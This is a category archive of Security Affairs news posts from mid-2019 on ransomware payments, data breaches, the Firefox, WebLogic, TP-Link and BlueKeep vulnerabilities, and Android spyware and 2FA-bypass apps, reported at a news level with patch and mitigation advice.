Category Archives: Security Affairs

The Riviera Beach City pays $600,000 in ransom

The Riviera Beach City, Florida, agreed to pay $600,000 in ransom to decrypt its data after a ransomware-based attack hit its computer system.

The Riviera Beach City Council voted unanimously to pay $600,000 in ransom to decrypt its records after a ransomware attack hit its systems. The council has previously agreed to spend $941,000 to modernize the entire IT infrastructure after hackers broke into the city’s system three weeks ago, ecrypting data managed by the City.

The internal IT staff has been working with security consultants to restore the operations, but according to them the only way to decrypt the information was to pay the ransom. 

“The Riviera Beach City Council voted unanimously this week to pay the hackers’ demands, believing the Palm Beach suburb had no choice if it wanted to retrieve its records, which the hackers encrypted.” reported the Associated Press. “Spokeswoman Rose Anne Brown said Wednesday that the city of 35,000 residents has been working with outside security consultants, who recommended the ransom be paid.”

The attack began on May 29, the infection started when an employee at the Riviera Beach police department opened a malicious email containing a link that once clicked has allowed infecting the PC.

The ransomware rapidly spread inside the Riviera Beach City infrastructure, causing several problems. The email system was disabled, employees and vendors were paid by check rather than direct deposit, the communications went down, 911 dispatchers being unable to accept calls even if the service continues to operate.

Initially, the city council decided to not pay the ransom, but due to the difficulties in restoring the operations, it opted out to pay.

On Monday, city officials participating to a rapid meeting unanimously voted to use the city’s insurance to pay a ransom of 65 bitcoins (~$603,000).

“The payment is being covered by insurance.” continues the AP. “The FBI on its website says it “doesn’t support” paying off hackers, but Riviera Beach isn’t alone: many government agencies and businesses do.”

In July 2018, another Palm Beach suburb, Palm Springs, decided to pay a ransom, but it was not able to completely recover all its data.

In March 2019, computers of Jackson County, Georgia, were infected with ransomware that paralyzed the government activity until officials decided to pay a $400,000 ransom to decrypt the files.

“The FBI had no comment Wednesday on the Riviera Beach attack, but said 1,493 ransomware attacks were reported last year with victims paying $3.6 million to hackers — about $2,400 per attack. Some of those were against individuals.” concludes the AP.

Pierluigi Paganini

(SecurityAffairs – Riviera Beach City, hacking)

The post The Riviera Beach City pays $600,000 in ransom appeared first on Security Affairs.

Oregon Department of Human Services data breach impacted 645,000 clients

Oregon Department of Human Services announced it was a victim of a data breach in January, roughly 645,000 potentially impacted.

Oregon Department of Human Services officials confirmed that the organization has suffered a data breach that has exposed personal details and health information of 645,000 clients.

The incident happened in January and the Oregon Department of Human Services is notifying the incident to the clients.

“The Oregon Department of Human Services is notifying about 645,000 clients whose personal information is now at risk from a January data breach. State officials announced the notifications on Tuesday. They‘ll will start mailing them on Wednesday.” states the Statesman-Journal.

“Affected people were enrolled in the department’s welfare and children services programs at the time of the breach. Officials said the compromised data includes personal health information, but it’s unknown if was viewed or inappropriately used.”

Oregon Department of Human Services

Individuals impacted by the data breach were enrolled in the department’s welfare and children services programs at the time of the security incident.

“The state is also providing 12 months of identity theft monitoring and recovery services, which includes a $1 million insurance reimbursement policy to impacted individuals.” reads the Associated Press.

The department was hit by a phishing campaign on January 8, 2019, and at least nine employees have been deceived in the attack.

“The breach happened during an email “phishing” attempt that targeted the department Jan. 8. Nine employees opened the email and clicked on a link that gave the perpetrator access to their email accounts.” concludes the AP.

Pierluigi Paganini

(SecurityAffairs – Oregon Department of Human Services, hacking)

The post Oregon Department of Human Services data breach impacted 645,000 clients appeared first on Security Affairs.

Tor Browser 8.5.2 fixes Firefox zero-day. Update it now!

Developers at the Tor Project have released the Tor Browser 8.5.2 to address the recently fixed CVE-2019-11707 zero-day flaw in Mozilla Firefox.

Yesterday I reported the news of a critical zero-day in Firefox that was addressed by Mozilla with a new release. The vulnerability, tracked as CVE-2019-11707, is a type confusion flaw in Array.pop. Mozilla has addressed it with the release of Firefox 67.0.3 and Firefox ESR 60.7.1.

The flaw was reported by Coinbase Security and Samuel Groß of Google Project Zero team. Samuel Groß explained that he reported the bug to Mozilla on April 15, 2019.

The researcher explained that the vulnerability could be used for remote code execution if chained with a separate sandbox escape issue.

Developers at the Tor Project have released the Tor Browser 8.5.2 to address the CVE-2019-11707 vulnerability too. It is very important for Tor users to use the updated version of the Tor Browser to protect their anonymity.

This vulnerability did not affect users running under the Safer or Safest security levels.

“This release fixes a critical security update in Firefox. In addition, we update NoScript to 10.6.3, fixing a few issues.” reads the announcement of the Tor Project. “Users of the safer and safest security levels were not affected by this security issue.”

Users can manually check the availability of new updates by going to the Tor Browser menu -> Help -> About Tor Browser.

Tor browser 8.5.2

Mozilla confirmed that threat actors exploited the zero-day in targeted attacks in the wild, the organizations did not provide technical details of the issue.

The DHS’s Cybersecurity and Infrastructure Security Agency (CISA) also issued a short alert for the vulnerability in Mozilla.

The Tor Browser 8.5.2 also includes an updated version of the NoScript addon (ver. 10.6.3.),

Bad news for Android users, the updates for the Android version of the Browser will not be available until the weekend, meantime Android users should use the browser with safer or safest security levels.

“As part of our team is currently traveling to an event, we are unable to access our Android signing token, therefore the Android release is not yet available. We expect to be able to publish the Android release this weekend.” continues the announcemente.

The Tor Browser 8.5.2 can be downloaded from the Tor Browser download page and from the distribution directory.

Below the full changelog for the new version:

Tor Browser 8.5.2 -- June 19 2019
 * All platforms
   * Pick up fix for Mozilla's bug 1544386
   * Update NoScript to 10.6.3
     * Bug 29904: NoScript blocks MP4 on higher security levels
     * Bug 30624+29043+29647: Prevent XSS protection from freezing the browser

Pierluigi Paganini

(SecurityAffairs – Tor, zero-day)

The post Tor Browser 8.5.2 fixes Firefox zero-day. Update it now! appeared first on Security Affairs.

Bouncing Golf cyberespionage campaign targets Android users in Middle East

According to security researchers at Trend Micro, a cyberespionage campaign is targeting Android users in Middle Eastern countries.

Security researchers at Trend Micro have spotted a cyberespionage campaign, dubbed ‘Bouncing Golf, that is targeting Android users in Middle Eastern countries.

Threat actors are using a piece of malware detected as GolfSpy, that implements multiple features and can hijack the victim’s device.

GolfSpy could steal the following information:

  • Device accounts
  • List of applications installed in the device
  • Device’s current running processes
  • Battery status
  • Bookmarks/Histories of the device’s default browser
  • Call logs and records
  • Clipboard contents
  • Contacts, including those in VCard format
  • Mobile operator information
  • Files stored on SDcard
  • Device location
  • List of image, audio, and video files stored on the device
  • Storage and memory information
  • Connection information
  • Sensor information
  • SMS messages
  • Pictures

Attackers distributed the malware in tainted legitimate applications that are hosted on websites advertised on social media. The tainted applications pose as communication, news, lifestyle, book, and reference apps that are commonly used in the Middle East.

“We uncovered a cyberespionage campaign targeting Middle Eastern countries. We named this campaign “Bouncing Golf” based on the malware’s code in the package named “golf.”” reads the blog post published by Trend Micro. “The malware involved, which Trend Micro detects as  AndroidOS_GolfSpy.HRX, is notable for its wide range of cyberespionage capabilities. Malicious codes are embedded in apps that the operators repackaged from legitimate applications.”

According to the experts that have analyzed the command and control (C&C) servers used in the Bouncing Golf campaign, more than 660 Android devices have been infected with GolfSpy malware. The attackers appear to be focused on stealing military-related information.

The researchers speculate on a possible connection to Domestic Kitten espionage activities, an extensive surveillance operation conducted by Iranian APT actor aimed at specific groups of individuals since 2016.

Experts found some similarities between the similarly structured strings of code and the format of the data targeted for theft.

bouncing golf golfspy

The GolfSpy malware is also able to connect to a remote server to fetch and perform a broad range of commands such as searching for/listing/deleting/renaming files, downloading/uploading files to/from the device, taking screenshots, installing application packages (APK), recording audio and video, and updating the malware.

Once the malware is executed, it generates a unique ID and then collects targeted data and writes it to a file on the mobile device.

The malicious code allows the attackers to choose the data types to collect, stolen data is encrypted using a simple XOR operation with a pre-configured key, then it is sent to the C2 via HTTP POST requests.

GolfSpy also connects C2 via a socket in order to receive additional commands. In this case, stolen data is also sent to the C2 in encrypted forms via the socket, experts pointed out that the encryption key is different from the one used when data is sent via HTTP.

The operators behind the Bouncing Golf campaign attempt to cover their tracks, for example, they masked the registrant contact details of the C&C domains used in the campaign. The IP addresses associated with the C&C servers used in the campaign also appear to be located in many European countries, including Russia, France, Holland, and Germany.

“As we’ve seen in last year’s mobile threat landscape, we expect more cyberespionage campaigns targeting the mobile platform given its ubiquity, employing tried-and-tested techniques to lure unwitting users.” Trend Micro concludes. “The extent of information that these kinds of threats can steal is also significant, as it lets attackers virtually take over a compromised device,”

Pierluigi Paganini

(SecurityAffairs – Bouncing Golf, hacking)

The post Bouncing Golf cyberespionage campaign targets Android users in Middle East appeared first on Security Affairs.

AMCA files for bankruptcy following the recently disclosed security breach

Retrieval-Masters Creditors Bureau, the company that operates healthcare billing services provider AMCA, has filed for Chapter 11 bankruptcy due to a recent data breach.

Retrieval-Masters Creditors Bureau, the company that operates the recovery agency for patient collections American Medical Collection Agency (AMCA), has filed for Chapter 11 bankruptcy due to a recent security breach that affected millions of individuals.

The company Retrieval-Masters Creditors Bureau would pay millions of dollars for the incident response, for this reason, it has decided to terminate AMCA.

The news is disconcerting and demonstrates the potential effects of a data breach on an organization.

The incident impacted millions of users, a filing with the U.S. Securities and Exchange Commission (SEC) Quest revealed that the attackers broke into the web payment portal of the American Medical Collection Agency between August 1, 2018 and March 30, 2019.

AMCA provides services to numerous firms, including the revenue cycle management provider Optum360, medical testing firm Quest Diagnostics, and LabCorp.

AMCA databreach

The security breach has impacted roughly 12 million of Quest Diagnostics‘ patients and roughly 7.7 of LabCorp patients. After the disclosure of the incident, Labcorp announced the terminations of business activities with AMCA and Quest Diagnostics has suspended sending collection requests to AMCA.

The hackers broke into company databases containing millions of medical test lab patients’ personal and payment information.

Other 422,000 patients of BioReference Laboratories, roughly 500,000 patients of CareCentrix, and customers of Sunrise Laboratories were also impacted by the security breach.

AMCA is in the storm, several class action lawsuits have been filed against it, and the number of potentially affected people continue to grow.

According to documents submitted to the U.S. Bankruptcy Court in the Southern District of New York, many payment cards used on the AMCA web site had been used for fraudulent charges.

The investigation into the incident has cost AMCA roughly $400,000 and it has been estimated that the company will spend another $3.8 million to send millions of notices to impacted individuals.

Pierluigi Paganini

(SecurityAffairs – AMCA, hacking)

The post AMCA files for bankruptcy following the recently disclosed security breach appeared first on Security Affairs.

Another Remote Code Execution flaw in WebLogic exploited in the wild

Oracle released emergency patches for another critical remote code execution vulnerability affecting WebLogic Server.

On Tuesday, Oracle released emergency patches for another critical remote code execution vulnerability affecting the WebLogic Server.

The vulnerability, tracked as CVE-2019-2729, affects WebLogic versions 10.3.6.0.0, 12.1.3.0.0 and 12.2.1.3.0. The vulnerability is a remotely exploitable deserialization vulnerability via XMLDecoder in Oracle WebLogic Server Web Services, it received a CVSS score of 9.8.

A remote attacker could exploit the CVE-2019-2729 flaw without authentication. The issue was independently reported to Oracle by many security researchers.

“This Security Alert addresses CVE-2019-2729, a deserialization vulnerability via XMLDecoder in Oracle WebLogic Server Web Services. This remote code execution vulnerability is remotely exploitable without authentication, i.e., may be exploited over a network without the need for a username and password.” reads the security advisory published by Oracle.

“Due to the severity of this vulnerability, Oracle strongly recommends that customers apply the updates provided by this Security Alert as soon as possible.”

Oracle WebLogic flaw

Oracle urges its users to apply the necessary patches and also the latest Critical Patch Update (CPU).

John Heimann, VP of Security Program Management at Oracle, pointed out that the CVE-2019-2729 is different from the recently discovered CVE-2019-2725 that was exploited in cryptojacking campaigns and in hacking campaigns spreading the Sodinokibi ransomware.

“Please note that while the issue addressed by this alert is a deserialization vulnerability, like that addressed in Security Alert CVE-2019-2725, it is a distinct vulnerability.” wrote Heimann.

“Due to the severity of this vulnerability, Oracle recommends that this Security Alert be applied as soon as possible.”

According to the experts at Knownsec 404 Team who also reported the flaw, the CVE-2019-2729 is actually the result of an uncomplete patch for CVE-2019-2725. Knownsec 404 Team confirmed that threat actors are already exploiting the CVE-2019-2729 in the wild.

“Then today, a new oracle webLogic deserialization RCE 0day vulnerability was found and is being actively used in the wild.We analyzed and reproduced the 0day vulnerability, which is based on and bypasses the patch for CVE-2019–2725.” reads a post published by Knownsec 404 Team.

Knownsec 404 Team provided the following temporary solutions:

  • Scenario-1: Find and delete wls9_async_response.war, wls-wsat.war and restart the Weblogic service.
  • Scenario-2: Controls URL access for the /_async/* and /wls-wsat/* paths by access policy control.

Pierluigi Paganini

(SecurityAffairs – CVE-2019-2729, hacking)

The post Another Remote Code Execution flaw in WebLogic exploited in the wild appeared first on Security Affairs.

Mozilla fixed a Firefox Zero-Day flaw exploited in targeted attacks

Mozilla released security updates for Firefox that addressed a critical zero-day vulnerability exploited in targeted attacks in the wild.

Mozilla released security updates for its Firefox web browser that address a critical vulnerability that has been actively exploited in the wild.

The zero-day vulnerability, tracked as CVE-2019-11707, is a type confusion flaw in Array.pop. Mozilla has addressed it with the release of Firefox 67.0.3 and Firefox ESR 60.7.1.

“A type confusion vulnerability can occur when manipulating JavaScript objects due to issues in Array.pop. This can allow for an exploitable crash. We are aware of targeted attacks in the wild abusing this flaw.” reads the security advisory published by Mozilla.

mozilla firefox zero-day

The flaw was reported by Coinbase Security and Samuel Groß of Google Project Zero team. Samuel Groß explained that he reported the bug to Mozilla on April 15, 2019.

The researcher explained that the vulnerability could be used for remote code execution if chained with a separate sandbox escape issue.

Mozilla confirmed that threat actors exploited the zero-day in targeted attacks in the wild, the organizations did not provide technical details of the issue.

The DHS’s Cybersecurity and Infrastructure Security Agency (CISA) also issued a short alert for the vulnerability in Mozilla.

“Mozilla has released security updates to address a vulnerability in Firefox and Firefox ESR. An attacker could exploit this vulnerability to take control of an affected system.” states the alert. “This vulnerability was detected in exploits in the wild.”

In 2016, security researchers found a malicious script that exploited another Firefox Zero-day to identify some users of the Tor anonymity network.

Pierluigi Paganini

(SecurityAffairs – Mozilla Firefox zero-day, hacking)

The post Mozilla fixed a Firefox Zero-Day flaw exploited in targeted attacks appeared first on Security Affairs.

Eatstreet, the online food ordering service disclosed a security breach

Eatstreet, the online food ordering service, disclosed a security breach that exposed customer payment card data and details of partners

EatStreet, an online and mobile food ordering service, disclosed a security breach that exposed customer payment card data and details of delivery and restaurant partners

Attackers breached the company network on May 3 stole data from its database. On May 17, the company discovered the intrusion and locked out the attacker.

Stolen data includes names, addresses, phone numbers, email addresses, as well as financial data (i.e. bank accounts, routing numbers, credit card numbers, expiration dates and card verification codes), billing addresses)..

“On May 3, 2019, an unauthorized third party gained access to our database, which we discovered on May 17, 2019. The unauthorized third party was able to acquire information that was in our database on May 3, 2019. We were able, however, to promptly terminate the unauthorized access to our systems when we discovered the incident.” reads the data breach notification letter sent to delivery and restaurant partners.

eatstreet

EatStreet currently offers its services to “over 15,000 restaurants in more than 1,100 cities,” the company’s Android app has over 100,000 installs as of June 5.

EatStreet promptly alerted the credit card payment processors and “hired a leading external IT forensics firm to respond to and investigate the incident. We audited our systems to validate that there was no other unauthorized access.”

At the time, law enforcement agencies are not investigating the incident:

“EatStreet continues to work with outside experts to identify other measures it can take to improve its security controls. While our investigation is ongoing, there was no law enforcement investigation that delayed notification to you.”

“In addition, we have enhanced the security of our systems, including reinforcing multi-factor authentication, rotating credential keys and reviewing and updating coding practices,”

According to ZDNet, the hacker who breached the company is Gnosticplayers, who made the headlines because between February and April disclosed the existence of some massive unreported data breaches in fifth rounds. The list of victims includes Canva, 500px, UnderArmor, ShareThis, GfyCat, Ge.tt, Evite, and others.

The hacker took credit for the data breach while discussing with ZDNet about the Canva hack allegations last month.

At the time it is not clear the extent of the security breach, but the hacker claimed he stole over six million user records.

“In an email to ZDNet today, the hacker claimed he was in the possession of over six million user records he took from the company’s servers. Over the past few months, this hacker has stolen and put up for sale 1,071 billion user credentials from 45 companies. “

Pierluigi Paganini

(SecurityAffairs – EatStreet, hacking)


The post Eatstreet, the online food ordering service disclosed a security breach appeared first on Security Affairs.

Modular Plurox backdoor can spread over local network

Kaspersky experts recently discovered a backdoor dubbed Plurox that can spread itself over a local network and can allow installing additional malware. 

Kaspersky experts discovered the Plurox backdoor in February, it can spread itself over a local network and could be used by attackers to install additional malware. 

The Plurox backdoor is written in C and compiled with Mingw GCC, it communicates with the command and control (C&C) server using the TCP protocol. The malware has a modular structure, it uses a variety of plugins to implements its functionalities. 

“The analysis showed the malware to have a few quite unpleasant features. It can spread itself over a local network via an exploit, provide access to the attacked network, and install miners and other malicious software on victim computers.” reads the analysis published by Kaspersky. “What’s more, the backdoor is modular, which means that its functionality can be expanded with the aid of plugins, as required. Post-analysis, the malware was named Backdoor.Win32.Plurox.”

The analysis of the code revealed the presence of debug lines, a circumstance that suggests the malware was at the testing stage when it was first spotted.

The Plurox backdoor uses two different ports to load plugins, the ports along with the C&C addresses are hardcoded into the source code of the malware. 

Monitoring the backdoor’s activity, experts discovered two “subnets.” One subnet is used to provide only miners (auto_proc, auto_cuda, auto_gpu_nvidia modules) to the Plurox backdoor. The other one, besides miners (auto_opencl_amd, auto_miner), is used to pass several plugins to the malware.

The Plurox backdoor supports the following commands:

  • Download and run files using WinAPI CreateProcess
  • Update bot
  • Delete and stop (delete own service, remove from autoload, delete files, remove artifacts from registry)
  • Download and run plugin
  • Stop plugin
  • Update plugin (stop process and delete file of old version, load and start new one)
  • Stop and delete plugin

The backdoor allows delivering the proper cryptocurrency miners depending on the system configuration.  

The researchers observed eight mining modules that were used to infect systems running on different processors: auto_proc, auto_cuda, auto_miner, auto_opencl_amd, auto_gpu_intel, auto_gpu_nvidia, auto_gpu_cuda, and auto_gpu_amd. 

Experts also discovered that the Plurox backdoor also supports a UPnP plugin designed to target a local network. 

“The module receives from the C&C a subnet with mask /24, retrieves all IP addresses from it, and attempts to forward ports 135 (MS-RPC) and 445 (SMB) for the currently selected IP address on the router using the UPnP protocol. If successful, it reports the result to the C&C center, waits for 300 seconds (5 minutes), and then deletes the forwarded ports. We assume that this plugin can be used to attack a local network. ” states the report.

In case the administrators will detect the attack on the host, they will see the attack coming directly from the router, not from a local machine.

The UPnP plugin is similar to the EternalSilence exploit, with the difference that Plurox forwards TCP port 135 instead of 139. 

The backdoor uses the SMB plugin for spreading over the network using the EternalBlue exploit.

The module borrows the code from the Trickster Trojan, the researchers believe that the authors of Plurox and Trickster may be linked.

Plurox

Further technical details, including IoCs are reported in the analysis published by Kaspersky.

Pierluigi Paganini

(SecurityAffairs – XSS, hacking)

The post Modular Plurox backdoor can spread over local network appeared first on Security Affairs.

Yana Peel, chief executive of London’s Galleries, resigned after discovery of her links with NSO group

The head of London’s Serpentine Galleries resigned on Tuesday following a Guardian report about her links to the Israeli surveillance firm NSO Group.

On Tuesday, the chief executive of London’s Serpentine Galleries, Yana Peel, resigned following the revelation of the Guardian newspaper about her links to the Israeli surveillance firm NSO Group.

According to the newspaper, Yana Peel is the co-owner of the controversial Israeli company. The board of trustees of the galleries has accepted Peel’s resignation.

“The head of the Serpentine Galleries has resigned after the Guardian revealed she is the co-owner of an Israeli cyberweapons company whose software has allegedly been used by authoritarian regimes to spy on dissidents.” reads the post published by the Guardian.

“On Tuesday, Yana Peel announced she was stepping down as the chief executive of the prestigious London art gallery so the work of the Serpentine would not be undermined by what she called“misguided personal attacks on me and my family”.

Last week, the Guardian revealed that Yana Peel is one of the owners of the private equity firm Novalpina Capital, co-founded by Peel’s husband, Stephen, that has the majority of the shares in NSO Group.

“I have decided I am better able to continue my work in supporting the arts, the advancement of human rights and freedom of expression by moving away from my current role.” Peel said

The principal product of the NSO Group is a surveillance software called Pegasus, it allows to spy on the most common mobile devices, including iPhones, Androids, and BlackBerry and Symbian systems.

NSO Group Pegasus spyware

Pegasus is a perfect tool for surveillance, it is able to steal any kind of data from smartphones and use them to spy on the surrounding environment through their camera and microphone.

The NSO Group operated in the dark for several years, until the researchers from the Citizenlab organization and the Lookout firm spotted its software in targeted attacks against UAE human rights defender, Ahmed Mansoor.

The researchers also spotted other attacks against a Mexican journalist who reported to the public a story of the corruption in the Mexican government.

NSO replied that its surveillance solution was “intended to be used exclusively for the investigation and prevention of crime and terrorism.”

People familiar with the NSO Group confirmed that the company has an internal ethics committee that monitors the sales and potential customers verifying that the software will not be abused to violate human rights.

Officially the sale of surveillance software is limited to authorized governments to support investigations of agencies on criminal organizations and terrorist groups.

Unfortunately, its software is known to have been abused to spy on journalists and human rights activists.

The traces collected by Amnesty International was corroborated by the findings of the investigation conducted by researchers at the internet watchdog Citizen Lab.

Citizen Lab collected evidence of attacks against 175 targets worldwide carried on with the NSO spyware. Citizen Lab uncovered other attacks against individuals in Qatar or Saudi, where the Israeli surveillance software is becoming very popular.

“The work of the Serpentine – and its incomparable artistic director – cannot be allowed to be undermined by misguided personal attacks on me and my family. These attacks are based upon inaccurate media reports now subject to legal complaints.” Peel said. “I have decided I am better able to continue my work in supporting the arts, the advancement of human rights and freedom of expression by moving away from my current role,” it continued.” 

Pierluigi Paganini

(SecurityAffairs – NSO group, Surveillence)

The post Yana Peel, chief executive of London’s Galleries, resigned after discovery of her links with NSO group appeared first on Security Affairs.

Android Apps uses a novel technique to by-pass 2FA and steal Bitcoin

Expert discovered a new technique bypassing SMS-based two-factor authentication while circumventing Google’s recent SMS permissions restrictions

The popular security expert Lukas Stefanko from ESET discovered some apps (namedBTCTurk Pro Beta and BtcTurk Pro Beta) impersonating the Turkish cryptocurrency exchange, BtcTurk, in the attempt of stealing login credentials.

by-pass 2FA and steal Bitcoin

In order to steal the 2FA OTPs the apps read the credentials that appear in 2FA notifications from the service, instead of intercepting the SMS messages delivering them,

Stefanko explained that the new increasing interest in Bitcoin is associated with the growth of its price.

“When Google restricted the use of SMS and Call Log permissions in Android apps in March 2019, one of the positive effects was that credential-stealing apps lost the option to abuse these permissions for bypassing SMS-based two-factor authentication (2FA) mechanisms.” wrote the expert.

“We have now discovered malicious apps capable of accessing one-time passwords (OTPs) in SMS 2FA messages without using SMS permissions, circumventing Google’s recent restrictions.”

When the apps are executed for the first time they request ‘notification access’ permission that is used to read the notifications displayed by other apps installed on the device, dismiss those notifications, or click buttons they contain.

Once the permission is granted to the apps, they will display a fake login message asking for the user’s BtcTurk login credentials. Once the users will provide the credentials, the apps display a false error message.

“Opss! Due to the change made in the SMS Verification system, we are temporarily unable to service our mobile application. After the maintenance work, you will be notified via the application. Thank you for your understanding.” reads the message (Translated from Turkish).

In the meantime, the login credentials for the services are sent back to the attacker’s server. 

At this point, the rogue apps leverage the notifications access permission to read all incoming notifications and select the ones related to applications of interest. The apps read the notifications associated with apps whose names contain the keywords, gm, yandex, mail, k9, outlook, SMS, and messaging. These notifications are sent to the attacker, who select the ones containing the one-time passwords used in 2FA.

“The displayed content of all notifications from the targeted apps is sent to the attacker’s server. The content can be accessed by the attackers regardless of the settings the victim uses for displaying notifications on the lock screen. The attackers behind this app can also dismiss incoming notifications and set the device’s ringer mode to silent, which can prevent victims from noticing fraudulent transactions happening.” continues the expert.

At this point, it is easy for the attackers to impersonate the victims while attempt to access the services. Any 2FA OTP can be dismissed from the victim’s phone and sent to the attacker, the attacker with this scheme has access to login credentials and OTP and can use them to access the account.

Experts at ESET are warning of the rapid spread of this technique that was recently observed in attacks against users of the Turkish Koineks exchange. ESET believes that the threat actor behind the attacks was the same.

“Just last week, we analyzed a malicious app impersonating the Turkish cryptocurrency exchange Koineks(kudos to @DjoNn35 for bringing that app to our attention). It is of interest that the fake Koineks app uses the same malicious technique to bypass SMS and email-based 2FA but lacks the ability to dismiss and silence notifications.”

“According to our analysis, it was created by the same attacker as the “BTCTurk Pro Beta” app analyzed in this blogpost. This shows that attackers are currently working on tuning this technique to achieve the “next best” results to stealing SMS messages.”

Experts believe that crooks will start using this technique against target in other industries, including banks and financial institutions.

Pierluigi Paganini

(SecurityAffairs – SFA, hacking)

The post Android Apps uses a novel technique to by-pass 2FA and steal Bitcoin appeared first on Security Affairs.

Expert found a critical RCE zero-day in TP-Link Wi-Fi Extenders

A zero-day vulnerability affects multiple models of TP-Link Wi-Fi extenders, it could be exploited to remotely execute code.

Security expert Grzegorz Wypych from IBM X-Force found a zero-day flaw that affects multiple models of TP-Link Wi-Fi extenders.

The Wi-Fi extenders capture the Wi-Fi signal from the main network device and rebroadcast it to areas where the signal is weak.

RE365 TP-Link Wi-Fi extenders

The vulnerability discovered by the expert could be exploited to remotely execute code on vulnerable devices and get complete control over the device and command it with the same privileges of the device’s legitimate user.

“As part of a recent series of vulnerabilities discovered in home routers, IBM X-Force researcher Grzegorz Wypych discovered a zero-day flaw in a TP-Link Wi-Fi extender.” reads the advisory published by IBM. “If exploited, this remote code execution (RCE) vulnerability can allow arbitrary command execution via a malformed user agent field in HTTP headers.”

The RCE flaw affects TP-Link Wi-Fi Extender models RE365, RE650, RE350 and RE500 running firmware version 1.0.2, build 20180213.

The flaw could be exploited by an unauthenticated remote attacker, the attack doesn’t require privilege escalation since all processes on the vulnerable devices already run with root-level access.

The extender operates on the MIPS architecture, like many routers, the zero-day flaw can be triggered

TP-Link’s Wi-Fi extenders operate on MIPS architecture and the vulnerability can be triggered by sending a malformed HTTP request.

The HTTP request that can allow the execution of any shell command on the targeted RE365 Wi-Fi extender.

“The following image shows an open telnet session from a fully compromised device. After connecting to TCP port 4444 we were able to obtain root level shell on the Wi-Fi extender without any privilege escalation, with all processes running as root.” continues the analysis.

TP-Link Wi-Fi extenders

“The sort of impact one can expect from such unauthenticated access is, for example, requesting the device to browse to a botnet command and control server or an infection zone,”

The experts warn of the risks of massive attacks on IoT devices carried out thought Mirai-like bots.

TP-Link already released security patches to address the zero-day flaw, the vendor published separated updates for each of the impacted models of Wi-Fi extenders (RE365RE500RE650RE350).

Pierluigi Paganini

(SecurityAffairs – TP-Link Wi-Fi extenders, hacking)

The post Expert found a critical RCE zero-day in TP-Link Wi-Fi Extenders appeared first on Security Affairs.

Researcher leaked a dataset of over 7,000,000 transactions scraped from the Venmo public API

Researcher leaked online a dataset containing over 7,000,000 transactions scraped from the Venmo public API

Venmo is a digital wallet app owned by PayPal that lets you make and share payments with friends.

In August 2016, security expert Martin Vigo devised a method to abuse an optional SMS-based feature that allowed users to authorize payments by replying to an SMS message with a provided 6-digit code. An attacker with physical access to the victim’s iPhone could steal funds from his account.

The attack technique leverages the following iOS features that are enabled by default. :

  • The Siri virtual assistant that allows replying to text messages from a locked device;
  • The text message preview that allows displaying part of the message on the display of a locked device’s screen.

In the attack scenario devised by the expert, the attacker sends a ‘reply-to-pay’ message to his victim’s locked mobile phone, and then leverages Siri to authorize the transactions. The expert explained that an attacker could steal up to $2,999.99 per week from the victim. The development team at Venmo addressed the issue by removing the SMS reply-to-pay feature.

Last year, the researcher Hang Do Thi Duc, reported that she was able to access 207,984,218 Venmo transactions by visiting ​this public URL. 207,984,218public Venmo transactions

Public data includes names, dates, pictures and messages sent, Hang Do Thi Duc was able to track a profile for some of them, such as two users identified with the monikers ‘The Cannabis Retailer’ and the ‘The cord dealer.’ She described The Cannabis Retailer with the following statement:

“With access to the first name,” she wrote, “I could infer that this person was male. I was also able to determine that he operates out of Santa Barbara, California. You might wonder how: some of his customers have a Facebook URL as their profile picture which includes their Facebook ID and so it was easy for me to see where some of them, and therefore the protagonist of this story as well, live… He registered on January 24, 2017, a day before his first transaction, and had a total of ?943 transactions in 2017.”

Time is passed by Venmo continues to provide a public stream of the users’ transactions.

Last week, researcher Dan Salmon published details related to more than 7 million new transactions that were scraped from Venmo onto GitHub between July and September 2018, in October 12018, and in January and February 2019. He decided to publish the dataset to warn Venmo users of publicly availability of their data.

“This is a dataset of over 7,000,000 transactions scraped from the Venmo public API. Venmo is an app which allows users to easily send and receive money.” wrote Salmon.

“I am releasing this dataset, in order to bring attention to Venmo users that all of this data is publicly available for anyone to grab without even an API key. There is some very valuable data here for any attacker conducting OSINT research.”

Anyone could analyze this dataset and profile the users posing a serious threat to them.

Experts suggest Venmo users set ‘private’ mode for their transactions, in this way the platform will not share the transaction anywhere other than your own personal feed and, if it’s a payment to another user, the feed of the other person in the payment.

venmo privacy

To update your privacy settings on the web first log in to venmo.com. Then navigate to Settings → Privacy and select your preferred defaultprivacy setting. Finally, make sure to click Save Settings.

Pierluigi Paganini

(SecurityAffairs – Venmo, privacy)

The post Researcher leaked a dataset of over 7,000,000 transactions scraped from the Venmo public API appeared first on Security Affairs.

DHS also issued an alert for the Windows BlueKeep flaw

The Cybersecurity and Infrastructure Security Agency (CISA) of the U.S. DHS on Monday issued an alert for the BlueKeep Windows flaw (CVE-2019-0708).

After Microsoft and the US NSA, the Cybersecurity and Infrastructure Security Agency (CISA) of the U.S. DHS on Monday issued an alert for the BlueKeep Windows flaw (CVE-2019-0708).

Experts at the CISA Agency successfully exploited the BlueKeep flaw on a machine running Windows 2000. The agency urges Microsoft users and administrators to install security patches, disable unnecessary services, enable Network Level Authentication (NLA) if available, and block TCP port 3389.

Below an excerpt from the security advisory:

“CISA encourages users and administrators review the Microsoft Security Advisory [3] and the Microsoft Customer Guidance for CVE-2019-0708 [4] and apply the appropriate mitigation measures as soon as possible:

  • Install available patches. Microsoft has released security updates to patch this vulnerability. Microsoft has also released patches for a number of OSs that are no longer officially supported, including Windows Vista, Windows XP, and Windows Server 2003. As always, CISA encourages users and administrators to test patches before installation.”

For OSs that do not have patches or systems that cannot be patched, other mitigation steps can be used to help protect against BlueKeep:

  • Upgrade end-of-life (EOL) OSs. Consider upgrading any EOL OSs no longer supported by Microsoft to a newer, supported OS, such as Windows 10.
  • Disable unnecessary services. Disable services not being used by the OS. This best practice limits exposure to vulnerabilities.  
  • Enable Network Level Authentication. Enable Network Level Authentication in Windows 7, Windows Server 2008, and Windows Server 2008 R2. Doing so forces a session request to be authenticated and effectively mitigates against BlueKeep, as exploit of the vulnerability requires an unauthenticated session.
  • Block Transmission Control Protocol (TCP) port 3389 at the enterprise perimeter firewall. Because port 3389 is used to initiate an RDP session, blocking it prevents an attacker from exploiting BlueKeep from outside the user’s network. However, this will block legitimate RDP sessions and may not prevent unauthenticated sessions from being initiated inside a network.

The vulnerability, tracked as CVE-2019-0708, impacts the Windows Remote Desktop Services (RDS) and was addressed by Microsoft with May 2019 Patch Tuesday updates. BlueKeep is a wormable flaw that can be exploited by malware authors to create malicious code with WannaCry capabilities.

As explained by Microsoft, this vulnerability could be exploited by malware with wormable capabilities, it could be exploited without user interaction, making it possible for malware to spread in an uncontrolled way into the target networks.

